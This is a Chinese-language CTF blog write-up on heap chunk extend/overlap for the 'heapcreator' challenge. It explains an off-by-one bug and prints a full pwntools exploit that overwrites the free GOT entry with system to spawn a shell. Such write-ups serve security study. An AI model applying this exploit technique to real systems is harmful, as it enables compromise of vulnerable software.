<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  
  <meta name="description" content="1.前言ctfwiki，堆重叠(chunk extend and overlapping)以及例题heapcreator，欠的第二篇博客哭哭，还有一篇写的好累" />
  

  
  
  
  
  
  
  <title>heap_extend heapcreator | refrain的blog</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="1.前言ctfwiki，堆重叠(chunk extend and overlapping)以及例题heapcreator，欠的第二篇博客哭哭，还有一篇写的好累">
<meta property="og:type" content="article">
<meta property="og:title" content="heap_extend heapcreator">
<meta property="og:url" content="http://example.com/2021/10/21/heap-extend-heapcreator/index.html">
<meta property="og:site_name" content="refrain的blog">
<meta property="og:description" content="1.前言ctfwiki，堆重叠(chunk extend and overlapping)以及例题heapcreator，欠的第二篇博客哭哭，还有一篇写的好累">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/2021/10/21/heap-extend-heapcreator/1.png">
<meta property="og:image" content="http://example.com/2021/10/21/heap-extend-heapcreator/2.png">
<meta property="og:image" content="http://example.com/2021/10/21/heap-extend-heapcreator/3.png">
<meta property="article:published_time" content="2021-10-21T12:13:36.000Z">
<meta property="article:modified_time" content="2021-10-21T16:00:15.088Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/2021/10/21/heap-extend-heapcreator/1.png">
  
  
    <link rel="icon" href="/css/images/favicon.ico">
  
  
<link rel="stylesheet" href="/css/style.css">

  

  
  <!-- baidu webmaster push -->
  <script src='//push.zhanzhang.baidu.com/push.js'></script>
<meta name="generator" content="Hexo 5.4.0"></head>
<body class="home blog custom-background custom-font-enabled single-author">
  <div id="page" class="hfeed site">
      <header id="masthead" class="site-header" role="banner">
    <hgroup>
      <h1 class="site-title">
        <a href="/" title="refrain的blog" rel="home">refrain的blog</a>
      </h1>
      
        <h2 class="site-description hitokoto"></h2>
        <script type="text/javascript" src="https://v1.hitokoto.cn/?encode=js"></script>
      
    </hgroup>

    <nav id="site-navigation" class="main-navigation" role="navigation">
            <button class="menu-toggle">菜单</button>
            <a class="assistive-text" href="/#content" title="跳至内容">跳至内容</a><!--TODO-->
            <div class="menu-main-container">
                <ul id="menu-main" class="nav-menu">
                
                    <li class="menu-item menu-item-type-post_type menu-item-object-page"><a href="/">Home</a></li>
                
                    <li class="menu-item menu-item-type-post_type menu-item-object-page"><a href="/archives">Archives</a></li>
                
                </ul>
            </div>
    </nav>
</header>

      <div id="main" class="wrapper">
        <div id="primary" class="site-content"><div id="content" role="main"><article id="post-heap-extend-heapcreator" class="post-heap-extend-heapcreator post type-post status-publish format-standard hentry">
    <!---->

      <header class="entry-header">
        
        
  
    <h1 class="entry-title article-title">
      heap_extend heapcreator
    </h1>
  

        
        <div class="comments-link">
            
            <a href="javascript:void(0);" data-url="http://example.com/2021/10/21/heap-extend-heapcreator/" data-id="ckv14s6610003hovk9x07hs6k" class="leave-reply bdsharebuttonbox" data-cmd="more">Share</a>
        </div><!-- .comments-link -->
      </header><!-- .entry-header -->

    <div class="entry-content">
      
        <h1 id="1-前言"><a href="#1-前言" class="headerlink" title="1.前言"></a>1.前言</h1><p>ctfwiki，堆重叠(chunk extend and overlapping)以及例题heapcreator，欠的第二篇博客哭哭，还有一篇写的好累</p>
<span id="more"></span>

<h1 id="2-堆重叠"><a href="#2-堆重叠" class="headerlink" title="2.堆重叠"></a>2.堆重叠</h1><p>感觉就是更改size位和prev_size位造成overlapping或者shrink，很好理解没啥好说的</p>
<h1 id="3-hitcontraining-heapcreator"><a href="#3-hitcontraining-heapcreator" class="headerlink" title="3.hitcontraining_heapcreator"></a>3.hitcontraining_heapcreator</h1><h2 id="1-逆向"><a href="#1-逆向" class="headerlink" title="1.逆向"></a>1.逆向</h2><h3 id="1-add"><a href="#1-add" class="headerlink" title="1.add"></a>1.add</h3><p><img src="/2021/10/21/heap-extend-heapcreator/1.png" alt="1"></p>
<p>没啥好说，先malloc一个0x10的堆块，在这里存储他的大小以及地址，然后紧接着malloc(size)</p>
<h3 id="2-delete"><a href="#2-delete" class="headerlink" title="2.delete"></a>2.delete</h3><p><img src="/2021/10/21/heap-extend-heapcreator/2.png" alt="2"></p>
<p>很干净。</p>
<h3 id="3-edit"><a href="#3-edit" class="headerlink" title="3.edit"></a>3.edit</h3><p><img src="/2021/10/21/heap-extend-heapcreator/3.png" alt="3"></p>
<p>首先按照习惯我们应该看一下read_input，因为大部分off by one漏洞都会出在这种手写的函数上，但是这里没有漏洞我也就不贴图了，就是一个read函数，read_input的两个参数一个是写入的地址，另外一个写入的长度，然后注意这两个参数看起来一样，但其实一个是</p>
<p><em>((&amp;heaparray+v1)+1)这个指针，一个是</em>(&amp;heaparray+1)这个指针的值再+1，说白了其实就是数组下一个元素和本数组的值+1，对应malloc的地址，和malloc的size+1，所以这里size多+1了，有off by one漏洞，可以覆盖一个字节。</p>
<p>show函数比较正常，我们就不看了。</p>
<h2 id="2-漏洞利用"><a href="#2-漏洞利用" class="headerlink" title="2.漏洞利用"></a>2.漏洞利用</h2><p>我的习惯还是一点点看wp</p>
<p>from pwn import *<br>p = process(“./heapcreator”)<br>#p = remote(“node4.buuoj.cn”,25871)<br>elf = ELF(“./heapcreator”)<br>libc = ELF(“/lib/x86_64-linux-gnu/libc-2.23.so”)<br>#libc = ELF(“libc-2.23-buu.so”)<br>def creat(size,content):<br>        p.recvuntil(“Your choice :”)<br>        p.sendline(“1”)<br>        p.recvuntil(“Size of Heap : “)<br>        p.sendline(str(size))<br>        p.recvuntil(“Content of heap:”)<br>        p.sendline(content)<br>        p.recvuntil(“SuccessFul”)<br>def edit_heap(index,content):<br>        p.recvuntil(“Your choice :”)<br>        p.sendline(“2”)<br>        p.recvuntil(“Index :”)<br>        p.sendline(str(index))<br>        p.recvuntil(“Content of heap : “)<br>        p.sendline(content)<br>def show_heap(index):<br>        p.recvuntil(“Your choice :”)<br>        p.sendline(“3”)<br>        p.recvuntil(“Index :”)<br>        p.sendline(str(index))<br>def delete(index):<br>        p.recvuntil(“Your choice :”)<br>        p.sendline(“4”)<br>        p.recvuntil(“Index :”)<br>        p.sendline(str(index))</p>
<p>程序的功能实现，没啥好说的</p>
<p>creat(0x18,b’a’*8)<br>creat(0x10,b’b’*8)<br>creat(0x10,b’c’*8)<br>creat(0x10,b’/bin/sh’)</p>
<p>创建4个chunk，因为每次会创建一个0x10的chunk，我用chunk_struct来代指，这里第一个chunk用0x18，大家可以自己调试一下，这样会复用下一个chunk的prev_size，也就是我们可以通过off by one来直接覆盖下一个chunk的size位，如果用0x20,0x30这种就只能覆盖到prev_size</p>
<p>edit_heap(0,b’c’*0x18+p64(0x81))<br>delete(1)<br>size = b’\x08’.ljust(8, b’\x00’)<br>payload = b’d’*0x40 + size + p64(elf.got[‘free’])<br>creat(0x70,payload)<br>show_heap(2)<br>p.recvuntil(b”Content : “)<br>puts_addr = u64(p.recv(6).ljust(8, b’\x00’))<br>libc_base = puts_addr - libc.symbols[‘free’]<br>sys_addr = libc_base + libc.symbols[‘system’]<br>edit_heap(2,p64(sys_addr))<br>delete(3)<br>gdb.attach(p)<br>p.interactive()</p>
<p>然后我们通过off by one修改了chunk1_struct的size位，再将他delete然后再malloc(0x70),系统就会把他拿出来，同时我们通过creat同时的写入功能覆盖了chunk2_struct中存储chunk2地址的指针为free的got表，然后常规操作覆写got表即可。</p>
<p>贴一下完整exp</p>
<p>from pwn import *<br>p = process(“./heapcreator”)<br>#p = remote(“node4.buuoj.cn”,25871)<br>elf = ELF(“./heapcreator”)<br>libc = ELF(“/lib/x86_64-linux-gnu/libc-2.23.so”)<br>#libc = ELF(“libc-2.23-buu.so”)<br>def creat(size,content):<br>    p.recvuntil(“Your choice :”)<br>    p.sendline(“1”)<br>    p.recvuntil(“Size of Heap : “)<br>    p.sendline(str(size))<br>    p.recvuntil(“Content of heap:”)<br>    p.sendline(content)<br>    p.recvuntil(“SuccessFul”)<br>def edit_heap(index,content):<br>    p.recvuntil(“Your choice :”)<br>    p.sendline(“2”)<br>    p.recvuntil(“Index :”)<br>    p.sendline(str(index))<br>    p.recvuntil(“Content of heap : “)<br>    p.sendline(content)<br>def show_heap(index):<br>    p.recvuntil(“Your choice :”)<br>    p.sendline(“3”)<br>    p.recvuntil(“Index :”)<br>    p.sendline(str(index))<br>def delete(index):<br>    p.recvuntil(“Your choice :”)<br>    p.sendline(“4”)<br>    p.recvuntil(“Index :”)<br>    p.sendline(str(index))</p>
<p>creat(0x18,b’a’*8)<br>creat(0x10,b’b’*8)<br>creat(0x10,b’c’*8)<br>creat(0x10,b’/bin/sh’)<br>edit_heap(0,b’c’*0x18+p64(0x81))<br>delete(1)<br>size = b’\x08’.ljust(8, b’\x00’)<br>payload = b’d’*0x40 + size + p64(elf.got[‘free’])<br>creat(0x70,payload)<br>#show_heap(2)<br>#p.recvuntil(b”Content : “)<br>#puts_addr = u64(p.recv(6).ljust(8, b’\x00’))<br>#libc_base = puts_addr - libc.symbols[‘free’]<br>#sys_addr = libc_base + libc.symbols[‘system’]<br>#edit_heap(2,p64(sys_addr))<br>#delete(3)<br>gdb.attach(p)<br>p.interactive()</p>

      
    </div><!-- .entry-content -->

    <footer class="entry-meta">
    <a href="/2021/10/21/heap-extend-heapcreator/">
    <time datetime="2021-10-21T12:13:36.000Z" class="entry-date">
        2021-10-21
    </time>
</a>
    
    
    </footer>
</article>


    
<nav class="nav-single">
    <h3 class="assistive-text">文章导航</h3>
    
    
        <span class="nav-next"><a href="/2021/10/15/unlink/" rel="next">unlink <span class="meta-nav">→</span></a></span>
    
</nav><!-- .nav-single -->







</div></div>
        <div id="secondary" class="widget-area" role="complementary">
  
    <aside id="search" class="widget widget_search"><form role="search" method="get" accept-charset="utf-8" id="searchform" class="searchform" action="//google.com/search">
    <div>
        <input type="text" value="" name="s" id="s" />
        <input type="submit" id="searchsubmit" value="搜索" />
    </div>
</form></aside>
  
    
  
    
  
    
  <aside class="widget">
    <h3 class="widget-title">Recents</h3>
    <div class="widget-content">
      <ul>
        
          <li>
            <a href="/2021/10/21/heap-extend-heapcreator/">heap_extend heapcreator</a>
          </li>
        
          <li>
            <a href="/2021/10/15/unlink/">unlink</a>
          </li>
        
          <li>
            <a href="/2021/10/09/unsortedbin-attack/">unsortedbin attack</a>
          </li>
        
          <li>
            <a href="/2021/10/03/fastbin-attack/">fastbin attack</a>
          </li>
        
          <li>
            <a href="/2021/09/21/babyheap-0ctf-2017-wp/">babyheap_0ctf_2017-wp</a>
          </li>
        
      </ul>
    </div>
  </aside>

  
    
  
    
  
</div>
      </div>
      <footer id="colophon" role="contentinfo">
    <p>&copy; 2021 John Doe
    All rights reserved.</p>
    <p>Powered by <a href="http://hexo.io/" target="_blank">Hexo</a></p>
</footer>
    <script>window._bd_share_config={"common":{"bdSnsKey":{},"bdText":"","bdMini":"1","bdMiniList":false,"bdPic":"","bdStyle":"2","bdSize":"16"},"share":{}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='/js/share.js'];</script>

<script src="/js/jquery-3.3.1.min.js"></script>


  
<link rel="stylesheet" href="/fancybox/jquery.fancybox.css">

  
<script src="/fancybox/jquery.fancybox.pack.js"></script>




<script src="/js/script.js"></script>


<script src="/js/navigation.js"></script>

<div id="bg"></div>

  </div>
</body>
</html>